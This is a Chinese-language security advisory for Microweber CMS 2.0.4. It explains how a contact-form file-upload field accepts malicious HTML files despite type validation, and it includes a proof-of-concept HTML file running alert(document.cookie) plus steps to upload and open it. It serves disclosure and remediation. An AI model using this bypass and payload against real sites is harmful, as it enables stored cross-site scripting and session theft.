在 Microweber CMS 2.0.4 版本中,当创建的表单启用了文件上传选项时,即使该字段应用了某些类型的验证,仍有可能发送恶意的 HTML 文件。
该漏洞允许攻击者上传包含脚本的文件,这些脚本可导致各种恶意活动,例如窃取会话 cookie 或登录凭据、重定向、安装恶意软件等。
更新到最新版本的 Microweber。
1) 在 Microweber CMS 安装中,创建一个包含联系表单的页面,并添加 文件上传 字段。
2) 使用以下内容创建一个新文件,并将其保存为 poc.htm:
<svg></svg>
<html>
<head>
</head>
<body>
<h1>Hi!</h1>
<script>
alert(document.cookie)
</script>
</body>
</html>
3) 访问表单页面并上传创建的 poc.htm 文件。

4) 现在,要运行发送的文件,只需访问 http://yoursite.com/userfiles/media/default/contact_form/poc.htm
(将 https://yoursite.com 替换为您测试安装的地址。)

注意:请注意,即使 文件上传 字段中存在某些验证措施,如"图像文件"和"自定义文件类型"(如"jpg"),上述步骤仍然有效。